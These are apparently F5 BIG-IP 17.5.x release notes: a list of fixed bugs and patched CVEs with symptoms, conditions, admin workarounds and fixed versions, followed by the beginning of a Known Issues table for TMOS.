1441577-6 : CVE-2023-42795 tomcat: improper cleaning of recycled objects could lead to information leak

Links to More Info: K000138178, BT1441577


1401961-4 : A blade with a non-functional backplane may override the dag context for the whole system

Links to More Info: BT1401961

Component: TMOS

Symptoms:
A blade with a non-functional backplane may override the dag context for the whole system.

Conditions:
- a blade has backplane problems, as evidenced by "shared random" not being ready in `tmctl -d blade tmm/ready_for_world_stat`.

Impact:
The traffic is black-holed into a non-functional blade.

Workaround:
Depending on the nature of the blade fault, a workaround is to either disable or just reboot the non-functional blade.

Fix:
A blade with a non-functional backplane cannot override the dag context for the whole system anymore.

Fixed Versions:
17.5.1


1400533-5 : TMM core dump include SIGABRT multiple times, on the Standby device.

Links to More Info: BT1400533

Component: Access Policy Manager

Symptoms:
The tmm running on the Standby device is repeatedly killed by sod. There are number of SessionDB ERROR messages on the tmm log.

/var/log/tmm1:
notice session_ha_context_callback: SessionDB ERROR: received invalid or corrupt HA message; dropped message.

Conditions:
-- BIG-IP configured for high availability (HA)
-- Mirroring enabled
-- APM enabled
-- Traffic is being passed on the active device

Impact:
Tmm restarts on the standby device. If a failover occurs while the tmm is restarting, traffic is disrupted.

Workaround:
None

Fix:
Persisting sub-session information only in the active device, after the expiry.

Fixed Versions:
17.5.1


1393733-8 : CVE-2022-43750 kernel: memory corruption in usbmon driver

Links to More Info: K000139700, BT1393733


1390457-6 : CVE-2022-25147 apr-util: out-of-bounds writes in the apr_base64

Links to More Info: K000137702


1382313-5 : TMM might crash under certain conditions

Component: TMOS

Symptoms:
In select scenarios, specific configurations related to DDoS may inadvertently elevate the likelihood of instability within the tmm process.

Conditions:
DDoS configured.

Impact:
Elevated likelihood of instability within the tmm process.

Workaround:
Disable sPVA feature, use the following commands:

tmsh -c 'modify sys db dos.forceswdos value true'
tmsh -c 'list sys db dos.forceswdos'
# this should print "true"

sys db dos.forceswdos {
    value "true"
}

Note: This has a performance impact, as all DDoS function is handled in software.

Fix:
tmm does not crash.

Fixed Versions:
17.5.1


1382181-2 : BIG-IP resets only server-side on idle timeout when used FastL4 profile with loose-* settings enabled

Links to More Info: BT1382181

Component: Local Traffic Manager

Symptoms:
After upgrading to BIG-IP 17.1.0, observed that some of the client sessions are orphaned, this has caused multiple intermittent connection failures when connecting through BIG-IP.
When the FastL4 profile with loose-* settings enabled is used and an idle timeout of 300 seconds, after idle time of 300 seconds, the server-side connection resets but no reset is sent towards client.

Conditions:
- Use BIG-IP version 17.1.0 and above
- Use Fastl4 profile with loose-* settings enabled.
- Configure idle timeout values.

Impact:
Some client sessions will be orphaned and cause intermittent connection failures when trying to connect through BIG-IP.

Workaround:
If not required for a particular use case, then disable loose-close settings in Fastl4 profile.

Fixed Versions:
17.5.1


1365629-5 : FPS signature and engine update fail to access sys db key proxy.password

Links to More Info: BT1365629

Component: Application Security Manager

Symptoms:
FPS signature and engine update via proxy with password authentication fails

Conditions:
FPS signature and engine update via proxy that requires password authentication

Impact:
Automatic updates of FPS signatures and engine do not work when an HTTP proxy is configured.

Workaround:
Manually upload the file

Fixed Versions:
17.5.1.2, 17.1.2


1353609-8 : ZebOS BGP vulnerability CVE-2023-45886

Links to More Info: K000137315, BT1353609


1352649-4 : The trailing semicolon at the end of [HTTP::path] in the iRule is being omitted.

Links to More Info: BT1352649

Component: Local Traffic Manager

Symptoms:
When a http request with URL containing only one semi-colon at the end, it is omitted with HTTP::PATH

Conditions:
Basic http Virtual Server and request URL with ';' at the end

Impact:
[HTTP::PATH] incorrectly omits ';'

Workaround:
None

Fix:
Count on semicolon for HTTP::PATH even when there is no host-extension

Fixed Versions:
17.5.1


1336185-6 : NodeJS Vulnerability - CVE-2018-12122

Links to More Info: K000137090, BT1336185


1330801-8 : NodeJS Vulnerability CVE-2018-12123, CVE-2018-12121, CVE-2018-12122

Links to More Info: K000137090, BT1330801


1327169-7 : CVE-2023-24329 python: urllib.parse url blocklisting bypass

Links to More Info: K000135921, BT1327169


1326665-6 : CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

Links to More Info: K000135831


1314333-2 : Patch gnutls library for CVEs CVE-2018-10844, CVE-2018-10845, CVE-2018-10846

Component: TMOS

Symptoms:
These vulnerabilities affect the HMAC and CBC-mode processing in GnuTLS, making it susceptible to Lucky Thirteen-style timing attacks. By measuring response times for crafted TLS/DTLS packets, attackers can infer partial plaintext data. The high complexity of the attack, reliance on network conditions, and mitigations in later TLS versions result in an Attack Complexity (AC) of High.

Conditions:
NA

Impact:
CVE-2018-10844 – Affects HMAC-SHA-256 processing in GnuTLS, leading to possible plaintext recovery via statistical analysis of response times. CVE-2018-10845 – Targets CBC-mode padding handling, potentially exposing additional side-channel leaks. CVE-2018-10846 – Affects DTLS (Datagram TLS), making real-time encrypted communication (e.g., VoIP, VPNs) vulnerable to timing-based attacks.

Workaround:
Disable CBC-mode cipher suites in TLS configurations to prevent this attack vector.
Use TLS 1.3, as it eliminates CBC-mode ciphers and improves security.
Minimize the exposure of GnuTLS-based services to untrusted networks.

Fix:
Patched gnutls to fix the Vulnerability

Fixed Versions:
17.5.1.2


1309637-5 : Mac masquerade not working after VLAN movement on host interfaces

Links to More Info: BT1309637

Component: Local Traffic Manager

Symptoms:
Connectivity to the floating IP via the masquerade MAC fails when the VLAN is moved across interfaces.

Conditions:
-- BIG-IP is configured with a floating IP on a traffic group
-- MAC masquerade is enabled
-- The VLAN is assigned to a different interface

Impact:
Connectivity to the floating IP address fails following a failover.

Workaround:
After the VLAN movement, delete and reconfigure the MAC masquerade.

Fixed Versions:
17.5.1


1306309-4 : CVE-2023-28709 Apache tomcat: Fix for CVE-2023-24998 was incomplete

Links to More Info: K000135262, BT1306309


1306305-2 : CVE-2023-24998 [Apache Tomcat]: FileUpload DoS with excessive parts

Links to More Info: K000133052


1304081-7 : CVE-2023-2650 openssl: Possible DoS translating ASN.1 object identifiers

Links to More Info: K000135178, BT1304081


1301545-7 : CVE-2023-0568 php: 1-byte array overrun in common path resolve code

Links to More Info: K000134747, BT1301545


1292605-4 : Uncaught ReferenceError: ReferenceError: REquest is not defined

Links to More Info: BT1292605

Component: Access Policy Manager

Symptoms:
The Cache-fm-Modern.js file has a typo.

Conditions:
This issue occurs when using Modern JS support EHF.

Impact:
A Javascript error occurs: "Uncaught ReferenceError: ReferenceError: REquest is not defined".

Workaround:
Correct the typo and give the iRule with iFile workaround.

Fix:
The word "REquest" should be "Request" at all the places where there is a typo error.

Fixed Versions:
17.5.1


1282837-4 : DTLS1.2 Handshakes are causing tmm crash with mTLS connection

Component: Local Traffic Manager

Symptoms:
TMM crash will be observed during the DTLS1.2 handshake.

Conditions:
ServerSSL profile configured with,
 - key and certificate.
 - ssl-sign-hash value is Any

A backend server configured with DTLS1.2 protocol and enabled client authentication.

Impact:
TMM will crash for each DTLS1.2 handshake.

Workaround:
In serverSSL profile, select the ssl-sign-hash to SHA-256.

Fix:
DTLS1.2 handshakes perform as expected.

Fixed Versions:
17.5.1


1273161-5 : Secondary blades are unavailable, clusterd is reporting shutdown, and waiting for other blades

Links to More Info: BT1273161

Component: Local Traffic Manager

Symptoms:
On a multi-slot chassis, VCMP guest, or F5OS tenant, clusterd can enter a shutdown state causing some slots to become unavailable.

The event that can cause this is called a partition and occurs when clusterd stops receiving heartbeat packets from a slot over the mgmt_bp interface but is still receiving them over the tmm_bp interface.

Here is the error that is logged when this occurs:

Mar 17 10:38:28 localhost err clusterd[4732]: 013a0004:3: Marking slot 1 SS_FAILED due to partition detected on mgmt_bp from peer 2 to local 1

When this occurs, clusterd enters a shutdown state and at times will never recover.

Here is an example, tmsh show sys cluster command where clusterd is in the shutdown yet waiting state:

-----------------------------------------
Sys::Cluster: default
-----------------------------------------
Address 172.0.0.160/23
Alt-Address ::
Availability available
State enabled
Reason Cluster Enabled
Primary Slot ID 2
Primary Selection Time 03/17/23 10:38:30

  ----------------------------------------------------------------------------------
  | Sys::Cluster Members
  | ID Address Alt-Address Availability State Licensed HA Clusterd Reason
  ----------------------------------------------------------------------------------
  | 1 :: :: unknown enabled false unknown shutdown ShutDown: default/1 waiting for blade 2
  | 2 :: :: available enabled true standby running Run

Conditions:
Multi-slot chassis, VCMP guest, or F5OS tenant.
A blade determines there is a partition where it's receiving cluster packets over the tmm_bp interface but not the mgmt_bp interface.

Impact:
The unavailable slots/blades will not accept traffic.

Workaround:
Running tmsh show sys cluster will report the primary slot and all slot statuses.

For all blades reporting shutdown or (less likely) initializing and "waiting for blade(s)", restart clusterd on that slot with bigstart restart clusterd. Ensure you do not restart clusterd on the primary slot.

Fix:
None

Fixed Versions:
17.5.1.2


1270257-8 : CVE-2023-0662 php: DoS vulnerability when parsing multipart request body

Links to More Info: K000133753, BT1270257


1269709-5 : GUI should throw the error when the VS is configured with both vdi and HTTP/2 profiles

Links to More Info: BT1269709

Component: Access Policy Manager

Symptoms:
As the VDI profile is currently not supported in the HTTP/2 environment for which there is no warning message on the BIG-IP GUI about this limitation.

Conditions:
When both VDI Profile and HTTP/2 Profile is attached to the VS.

Impact:
The customer wants this error to be displayed on the BIGIP GUI if vdi and http/2 profiles both are attached to the VS together.

Workaround:
None

Fix:
Display the warning message on the BIG-IP GUI for the Configuration error: "Virtual server cannot have vdi and http/2 profiles at the same time" when both vdi and http/2 profiles are attached on the VS.

Fixed Versions:
17.5.1, 17.1.2, 16.1.5


1267221-5 : When TMM starts, Hyper-V shows no RX packets on the ethX interface

Links to More Info: BT1267221

Component: Local Traffic Manager

Symptoms:
BIG-IP Virtual Edition (VE) running on a Hyper-V host, when TMM starts, it sets the NIC queue count. When this happens, due to a bug in Hyper-V, ingress packets are no longer received on the data plane interfaces.

Packets egressed from TMM are being correctly sent to peer devices on the network.

Conditions:
- After upgrading from BIG-IP version 12, none of the data plane interfaces show ingress counters incrementing and no traffic is seen on the interface. The Management interface works properly.

Impact:
The data plane interfaces does not show ingress counters incrementing and no traffic is seen on the interface.

Workaround:
In Hyper-V manager, save the machine state and then start it back up or use a legacy network adapter.

Fix:
This change provides a workaround to not set the NIC queue counts if they are already set properly. To utilize this workaround the amount of memory should be verified so that the number of TMMs equals the number of CPUs on the VM.

A new log message in /var/log/tmm will log whether or not TMM changed the queue count.

Fixed Versions:
17.5.1


1266853-8 : CVE-2023-24998 Apache Commons FileUpload: FileUpload DoS with excessive parts

Links to More Info: K000133052


1240373-4 : CVE-2022-37436: Flaw in mod_proxy module of httpd

Links to More Info: K000132665


1144673-5 : Persistent Connection Issue in SSO v2 Plugin

Component: Access Policy Manager

Symptoms:
After a SAML flow is completed and sessions are removed following Single Logout (SLO), some connections may stay active in the flow table if the client does not initiate a reset (RST). The SSO plugin fails to properly manage shutdown events, causing these connections to remain open instead of being closed.

Conditions:
BIG-IP is configured as both a SAML Service Provider (SP) and Identity Provider (IDP), with Single Logout (SLO) enabled, and users remain on the browser after logging out.

Impact:
Persistent connections could lead to resource strain and may affect system performance.

Workaround:
NA

Fix:
No more idle connections in flow table.

Fixed Versions:
17.5.1


1144421-3 : CVE-2019-14866 cpio: improper input validation when writing tar header fields leads to unexpected tar generation

Component: TMOS

Symptoms:
cpio does not properly validate the values written in the header of a TAR file through the to_oct() function. When creating a TAR file from a list of files and one of those is another TAR file with a big size, cpio will generate the resulting file with the content extracted from the input one. This leads to unexpected results as the newly generated TAR file could have files with permissions the owner of the input TAR file did not have or in paths he did not have access to.

Conditions:
Occurs when creating tar archives with unvalidated or specially crafted input filenames.

Impact:
This vulnerability may generate malformed tar files, leading to interoperability issues or unexpected behavior in downstream tools.

Workaround:
NA

Fix:
Patched python to fix the vulnerability.

Fixed Versions:
17.5.1


1132449-6 : Incomplete or missing IPv6 IP Intelligence database results to connection reset and/or high TMM CPU usage

Links to More Info: BT1132449

Component: Advanced Firewall Manager

Symptoms:
The following IPv4 database load message is present in /var/log/ltm:
015c0010:5: Initial load of IPv4 Reputation database has been completed

Note the absence of the IPv6 version of the same message:

015c0010:5: Initial load of IPv6 Reputation database has been completed

Some scenarios can result in elevated TMM CPU utilization, for example, when using IPI in global policy.

The message "Scheduling priority: normal. Nice level: -19" is seen at a rate of about 100 lines per second, per tmm, in the /var/log/tmm* logs:

Conditions:
Failure to download IPv6 database from localdb-ipv6-daily.brightcloud.com.

Impact:
Any of the following:

- TCL error results when IPI is used in an iRule resulting in connection being reset.

- When using IPI in global policy, increased TMM CPU utilization may occur which leads to idle enforcer being triggered, TMM clock advanced messages appearing in LTM logs, or TMM restarting without core when MCPD is unable to communicate with TMM.

Workaround:
Ensure that BIG-IP is able to communicate using https with BrightCloud servers, including localdb-ipv6-daily.brightcloud.com. For more detailed troubleshooting steps, see K03011490 at https://my.f5.com/manage/s/article/K03011490.

Once the IPv6 reputation database has been retrieved and loaded issues should stop.

This line in ltm log shows load has completed:
015c0010:5: Initial load of IPv6 Reputation database has been completed

Fix:
None

Fixed Versions:
17.5.1, 16.1.6


1121517-5 : Interrupts on Hyper-V are pinned on CPU 0

Links to More Info: BT1121517

Component: TMOS

Symptoms:
CPU 0 utilization is much higher relative to other CPUs due to high amount of softirq.

Conditions:
BIG-IP is deployed on a Hyper-V platform.

Impact:
Performance is degraded.

Fix:
Interrupts are balanced across all CPUs.

Fixed Versions:
17.5.1, 16.1.4, 15.1.10


1099369-9 : CVE-2018-25032 [NodeJS]zlib: A flaw found in zlib, when compressing (not decompressing!) certain inputs.

Links to More Info: K21548854


1093685-8 : CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it

Links to More Info: K52379673, BT1093685


1081245-3 : [APM] SSO OAuth Bearer passthrough inserts an old access token instead of the latest one.

Links to More Info: BT1081245

Component: Access Policy Manager

Symptoms:
SSO Bearer authorization fails.

Conditions:
APM PRP is configured with just an OAuth Scope and SSO Bearer attached to PSP.

Impact:
Fails to read new token from request and forwards old token in session variables to backend pool after validation.

Workaround:
1. Configure a PSP of type 'OAuth-RS'
   a. Add OAuth Scope
   b. Add Variable assign with following expression
apm policy agent variable-assign /Common/RStype_AP_act_variable_assign_ag {
    variables {
        {
            expression "mcget {session.oauth.client.last.access_token}"
            secure true
            varname session.oauth.client./Common/oauth-aad-server.access_token
        }
    }
}

2. Configure PRP with Gating Criteria (As per your setup)
   a. Add a Variable-Assign inside SBR (subroutine)
apm policy agent variable-assign /Common/empty_act_variable_assign_ag {
    variables {
        {
            expression "mcget -secure {subsession.oauth.client.last.access_token}"
            secure true
            varname session.oauth.client./Common/oauth-aad-server.access_token
        }
    }
}

Fix:
N/A

Fixed Versions:
17.5.1


1078713-1 : Windows 11 not included in client OS check and Windows Info agent.

Links to More Info: BT1078713

Component: Access Policy Manager

Symptoms:
Branches/rules are not available for Windows 11 in the access policy.

Conditions:
-- Client OS check.
-- Windows Info agent.

Impact:
Unable to use client OS check and Windows Info agent for Windows 11.

Workaround:
Windows 10 and 11 share the same major and minor version and Windows 11 is differentiated by its build number, 22000.

Adding a "Windows Registry" agent such as this before the "Windows Info" agent do branch off Windows 11 machines.
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"."CurrentBuildNumber">="22000"

Fix:
N/A

Fixed Versions:
17.5.1


1069949-8 : CVE-2018-1000007 curl: HTTP authentication leak in redirects

Component: TMOS

Symptoms:
libcurl might accidentally leak authentication data to third parties.

When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the `Location:` response header value.

Sending the same set of headers to subsequent hosts is, in particular, a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy-sensitive information or data that could allow others to impersonate the libcurl-using client's request.

Conditions:
NA

Impact:
Sensitive information could be disclosed to an unauthorised user

Workaround:
NA

Fix:
Patched curl to fix the vulnerability.

Fixed Versions:
17.5.1


1069341-2 : CVE-2016-4738 libxslt: Heap overread due to an empty decimal-separator

Component: TMOS

Symptoms:
libxslt in Apple iOS before 10, OS X before 10.12, tvOS before 10, and watchOS before 3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site

Conditions:
NA

Impact:
It can result in DoS.

Workaround:
NA

Fix:
libxslt has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1068653-3 : CVE-2021-20271 rpm: Signature checks bypass via corrupted rpm package

Links to More Info: K10396196


1061485-9 : CVE-2019-19527: Linux kernel vulnerability

Component: TMOS

Symptoms:
A vulnerability was found in hiddev_open in drivers/hid/usbhid/hiddev.c in the USB Human Interface Device class subsystem, where an existing device must be validated prior to its access. The device should also ensure the hiddev_list cleanup occurs at failure, as this may lead to a use-after-free problem, or possibly escalate privileges to an unauthorized user.

Conditions:
NA

Impact:
Unauthorised access to BIGIP device

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.2


1059229-3 : CVE-2019-16994 kernel: Memory leak in sit_init_net() in net/ipv6/sit.c

Component: TMOS

Symptoms:
A flaw was found in the way the sit_init_net function in the Linux kernel handled resource cleanup on errors. This flaw allows an attacker to use the error conditions to crash the system.

Conditions:
Linux kernel versions before 5.0

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1058197-10 : CVE-2019-14973: LibTIFF Vulnerability

Component: TMOS

Symptoms:
_TIFFCheckMalloc and _TIFFCheckRealloc in tif_aux.c in LibTIFF through 4.0.10 mishandle Integer Overflow checks because they rely on compiler behaviour that is undefined by the applicable C standards. This can, for example, lead to an application crash.

Conditions:
NA

Impact:
It could lead to minor disruptions in service (availability impact) and may expose or modify some non-sensitive information (confidentiality and integrity impact)

Workaround:
unauthorized users cannot access the systems

Fix:
Patched LibTIFF to fix the vulnerability.

Fixed Versions:
17.5.1.2


1057141-7 : CVE-2018-14647 python: Missing salt initialization in _elementtree.c module

Links to More Info: K000151007, BT1057141


1052333-8 : CVE-2018-16885: Linux kernel vulnerability

Component: TMOS

Symptoms:
A flaw was found in the Linux kernel that allows the userspace to call memcpy_fromiovecend() and similar functions with a zero offset and buffer length. This can cause a read beyond the buffer boundaries flaw and, in certain cases, cause a memory access fault and a system halt by accessing an invalid memory address.

Conditions:
NA

Impact:
This can cause a read beyond the buffer boundaries flaw.

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.2


1052249-8 : CVE-2018-13094 kernel: NULL pointer dereference in xfs_da_shrink_inode function

Component: TMOS

Symptoms:
An issue was discovered in the XFS filesystem in fs/xfs/libxfs/xfs_attr_leaf.c in the Linux kernel. A NULL pointer dereference may occur for a corrupted xfs image after xfs_da_shrink_inode() is called with a NULL bp. This can lead to a system crash and a denial of service.

Conditions:
NA

Impact:
Exploitation of the vulnerability could cause the system to become unavailable (DoS).

Workaround:
Limit physical or local access to the system

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1


1052245-9 : CVE-2018-13093 kernel: NULL pointer dereference in lookup_slow function

Component: TMOS

Symptoms:
An issue was discovered in the XFS filesystem in fs/xfs/xfs_icache.c in the Linux kernel. There is a NULL pointer dereference leading to a system panic in lookup_slow() on a NULL inode->i_ops pointer when doing path walks on a corrupted xfs image. This occurs because of a lack of proper validation that cached inodes are free during an allocation.

Conditions:
Linux kernel versions before 4.17.3 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1052217-8 : CVE-2018-19985 kernel: oob memory read in hso_probe in drivers/net/usb/hso.c

Component: TMOS

Symptoms:
A flaw was found in the Linux kernel in the function hso_probe() which reads if_num value from the USB device (as an u8) and uses it without a length check to index an array, resulting in an OOB memory read in hso_probe() or hso_get_config_data(). An attacker with forged USB device with a physical access to a system (needed to connect such a device) can cause a system crash and a denial-of-service.

Conditions:
NA

Impact:
The primary impact of this vulnerability is a denial-of-service (DoS) due to the kernel crash

Workaround:
NA

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1


1052181-8 : CVE-2018-7191 kernel: denial of service via ioctl call in network tun handling

Component: TMOS

Symptoms:
In the tun subsystem in the Linux kernel, a local attacker could issue an ioctl to call dev_get_valid_name which is not called before register_netdevice. This allows local users to cause a denial of service (NULL pointer dereference and panic) via an ioctl(TUNSETIFF) call with a dev name containing a / character.

Conditions:
Linux kernel versions before 4.13.14 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1051869-9 : CVE-2018-20169: Linux kernel vulnerability

Component: TMOS

Symptoms:
A flaw was discovered in the Linux kernel's USB subsystem in the __usb_get_extra_descriptor() function in the drivers/usb/core/usb.c which mishandles a size check during the reading of an extra descriptor data. By using a specially crafted USB device which sends a forged extra descriptor, an unprivileged user with physical access to the system can potentially cause a privilege escalation or trigger a system crash or lock up and thus to cause a denial of service (DoS).

Conditions:
NA

Impact:
Unauthorized access to sensitive information, Unauthorized modification or corruption of data

Workaround:
Limit access to the affected systems to trusted networks or users.

Fix:
Patched kernel to fix the vulnerability.

Fixed Versions:
17.5.1.2


1051769-8 : CVE-2019-10140 kernel: overlayfs: NULL pointer dereference in ovl_posix_acl_create function in fs/overlayfs/dir.c

Component: TMOS

Symptoms:
An attacker with local access can create a denial of service situation via a NULL pointer dereference in ovl_posix_acl_create function in fs/overlayfs/dir.c. This can allow attackers with the ability to create directories on overlayfs to crash the kernel creating a denial of service (DOS).

Conditions:
Linux kernel versions before 3.10 are vulnerable

Impact:
It can result in DoS.

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1051697-9 : CVE-2019-11833 kernel: fs/ext4/extents.c leads to information disclosure

Component: TMOS

Symptoms:
A flaw was found in the Linux kernels implementation of ext4 extent management which did not correctly initialize memory regions in the extent tree block which may be exported to a local user to obtain sensitive information by reading empty/uninitialized data from the filesystem.

Conditions:
Linux kernel versions before 5.1.2 are vulnerable

Impact:
It can result in information disclosure

Workaround:
N/A

Fix:
kernel has been patched to address this vulnerability.

Fixed Versions:
17.5.1.2


1047789-1 : [APM] MCP err msg seen when editing/applying resource assign in VPE

Links to More Info: BT1047789

Component: TMOS

Symptoms:
An error message is found in /var/log/apm

MCP message handling failed in 0xb0ad80 (16973840): Sep 3 09:56:22 on 2 - MCP Message:

Conditions:
When VPE (or via CLI) "Advanced Resource Assign" agent is re-configured

Impact:
No functional impact.

Workaround:
None

Fixed Versions:
17.5.1


1043977-10 : CVE-2021-3672 CVE-2021-22931 NodeJS Vulnerabilities in iAppLX

Links to More Info: K53225395


1041889-5 : RRSIG missing for CNAME with RDATA in different zone

Links to More Info: BT1041889

Component: Global Traffic Manager (DNS)

Symptoms:
RRSIG missing for CNAME.

Conditions:
-- CNAME record with RDATA in different zone.
-- One zone dynamically signed.
-- The other zone in local BIND (ZoneRunner) with static DNSSEC records.

Impact:
DNSSEC validation failure.

Fixed Versions:
17.5.1.2


1041141-3 : CVE-2021-35942 glibc: Arbitrary read in wordexp()

Links to More Info: K98121587, BT1041141


1035781-9 : See: https://my.f5.com/manage/s/article/K75133288

Links to More Info: K75133288


1029013-9 : CVE-2016-10228 glibc: iconv program can hang when invoked with the -c option

Links to More Info: K52494142


1028701-12 : CVE-2019-9947 python: CRLF injection via the path part of the url passed to urlopen()

Links to More Info: K000151516, BT1028701


1027237-5 : Cannot edit virtual server in GUI after loading config with traffic-matching-criteria

Links to More Info: BT1027237

Component: TMOS

Symptoms:
After creating a virtual server with a traffic-matching-criteria and then loading the configuration, you are unable to make changes to it in the GUI. Attempting to do so results in an error similar to:

0107028f:3: The destination (0.0.0.0) address and mask (::) for virtual server (/Common/test-vs) must be be the same type (IPv4 or IPv6).

Conditions:
-- A virtual server that has traffic-matching-criteria (i.e., address and/or port lists).
-- The configuration has been saved at least once.
-- Attempting to edit the virtual server in the GUI.

Impact:
Unable to use the GUI to edit the virtual server.

Workaround:
Use TMSH to modify the virtual server.

Fixed Versions:
17.5.1.2


1008885-3 : Sessiondump CPU is showing unknown for Mac OS and BIG-IP platform

Component: Access Policy Manager

Symptoms:
After APM session, when a user creates an access session using Mac OS based clients, the session dump shows CPU as unknown in session.client.cpu value.

Conditions:
Mac OS based client is used.

Impact:
If session.client.cpu variable is used for any access policy decisions, it will fail as CPU is unknown.

Workaround:
-NA-

Fix:
CPU should be shown properly like x86_64 or any other.

Fixed Versions:
17.5.1.2


1001369-9 : D-Bus vulnerability CVE-2020-12049

Links to More Info: K16729408, BT1001369



Known Issues in BIG-IP v17.5.x


TMOS Issues

ID Number Severity Links to More Info Description
1991485 1-Blocking BT1991485 Re-adding a tunnel with the exact same name might result in tunnel ingress traffic getting dropped.
967769-4 2-Critical BT967769 During reset of high-speed interfaces, TMMs may mistakenly continue hardware watchdog checks
962729-4 2-Critical BT962729 New User automatically unlocked when "Automatically enable locked-out users after" is not configured
777389-8 2-Critical BT777389 In rare occurrences related to PostgreSQL monitor, the mcpd process restarts
742764-5 2-Critical BT742764 If two racoon daemon are spawned on startup, one fails and cores.
721591-4 2-Critical K000141369, BT721591 Java crashes with core during with high load on REST API
671545-6 2-Critical BT671545 MCPD core while booting up device with error "Unexpected exception caught"
566756-3 2-Critical BT566756 VCMP 4 cores on 3 blades : mcpd core when delete 255 dos profiles via tmsh command while machine is idle
2047593 2-Critical   Blade upgrade fails with the "HAL unexpected init failure (continuing) : Unknown slot for ChassisBase" error message
2037409-1 2-Critical BT2037409 Tmctl tables are corrupted for large cluster size and tmm memory shows 0
2007705-1 2-Critical BT2007705 HSL can incorrectly handle pending TCP connections leading to a TMM crash
1983145-1 2-Critical BT1983145 Memory Corruption due to xnet-DPDK
1966589-2 2-Critical BT1966589 Changes to fixup scripts breaks schema upgrade
1943217 2-Critical BT1943217 BGP - using 'no bgp default ipv4-unicast' might lead to a crash
1787517-4 2-Critical BT1787517 After upgrade to 17.1.2, expired auth tokens are not deleted from /var/run/pamcache
1757585-4 2-Critical BT1757585 Unable to install a license on an AWS BIG-IP VE
1678105-3 2-Critical BT1678105 F5OS tenant, TMM crashing after loading a UCS
1571817-4 2-Critical BT1571817 FQDN ephemeral pool member user-down state is not synced to the peer device
1395349-1 2-Critical BT1395349 The httpd service shows inactive/dead after "bigstart restart httpd"
1327649-4 2-Critical BT1327649 Invalid certificate order within cert-chain associated to JWK configuration
1305117-2 2-Critical BT1305117 SSL profile "no-dtlsv1.2" option is left disabled while upgrading from v14.x or v15.x to 17.1.0
1277389-1 2-Critical BT1277389 HSB transmitter lockup
1093717-6 2-Critical BT1093717 BGP4 SNMP traps are not working.
1077789-7 2-Critical BT1077789 System might become unresponsive after upgrading.
1006449-5 2-Critical BT1006449 High CPU utilization and slow SNMP response after upgrade
941961-6 3-Major BT941961 Upgrading system using WAM TCP profiles may prevent the configuration from loading
923745-6 3-Major BT923745 Ctrl-Alt-Delete in virtual console reboots BIG-IP Virtual Edition
921069-6 3-Major BT921069 Neurond cores while adding or deleting rules
904401-7 3-Major BT904401 Guestagentd or devmgmtd core
739904-6 3-Major BT739904 /var/log/ecm log is not rotated
664816-1 3-Major BT664816 The Neuron SDK rejects rule delete requests with -5 error
566995-6 3-Major BT566995 bgpd might crash in rare circumstances.
213618-2 3-Major   Resetting DB variable to default does not always work
2047429-3 3-Major BT2047429 PostgreSQL should dump a corefile when not exiting
2047293-2 3-Major BT2047293 TMM NULL dereference in Dyn-TCAM after multiple failures
2014597-2 3-Major BT2014597 Async session db ops are missing flow control
1993081-3 3-Major BT1993081 SNMP traps are not being generated for bigipExternalLinkDown (.1.3.6.1.4.1.3375.2.4.0.218) and bigipExternalLinkUp (.1.3.6.1.4.1.3375.2.4.0.219).
1989033-2 3-Major BT1989033 IPsec IKEv2 tunnel may fail to initiate or respond due to ERR_PORT
1976113 3-Major BT1976113 Deployment of BIG-IP Best Plus Images on Azure Fails with OSProvisioningClientError
1974701-1 3-Major BT1974701 PVA stats may be double incremented when pva mode is dedicated
1972465-1 3-Major BT1972465 LTM Syncookie always SW mode for a wildcard virtual server
1972273-2 3-Major BT1972273 [F5OS tenant] Adjusting VLAN mtu (or description) throws MCP validation error VLAN /Common/vlan has an id of X, and customer-tag of none and it cannot be used by VLAN /Common/vlan
1967589-2 3-Major BT1967589 Using tmsh to query iControl REST (tmsh list mgmt ...) commands consume an auth token and does not get removed immediately
1966941-2 3-Major BT1966941 High CPU or increased translation errors following upgrade or restart when DAG distribution changes
1958033-1 3-Major BT1958033 MCPD validates only one ssl profile when a virtual server attached to http/2 profile with enforce-tls-requirements enabled along with multiple clientssl profiles with anyone has renegotiation option enabled
1943669 3-Major BT1943669 "Automatic Update Check & Automatic Phone Home features" settings is changed upon running 'load sys config current-partition' in other partition
1938345 3-Major BT1938345 F5 on AWS : Unable to Launch F5 BIG-IP instance with latest firmware 17.5.0 in AWS
1936469-1 3-Major BT1936469 Multiple Ctrl-Alt-Delete signals in virtual console reboots BIG-IP Virtual Edition
1933105-3 3-Major BT1933105 TMM does not fragment the output before encapsulating the payload
1927521-1 3-Major BT1927521 DPDK has dependency on SSSE3
1927165 3-Major BT1927165 Fix rare race condition that could cause crash during TMM startup
1922617-3 3-Major BT1922617 BGP Multipath selection might be unpredictable.
1893989-1 3-Major BT1893989 NTP truncates symmetric keys to 30 bytes
1890749-2 3-Major BT1890749 In a multi-user scenario, the system is allowing users to create more authentication tokens than the maximum limit allowed per user.
1881569-4 3-Major BT1881569 Programs invoked by tmsh when session is interrupted may remain running
1854353-3 3-Major BT1854353 Users with Resource admin role are not able to save the UCS.
1849265-4 3-Major BT1849265 A VCMP guest may not exit hardware syncookie mode
1826273-2 3-Major BT1826273 Mysql client uses TLS1.1 when connecting to mysql server running 5.7
1813505-2 3-Major BT1813505 Snmpd may seg fault on systems with large amounts of virtual memory
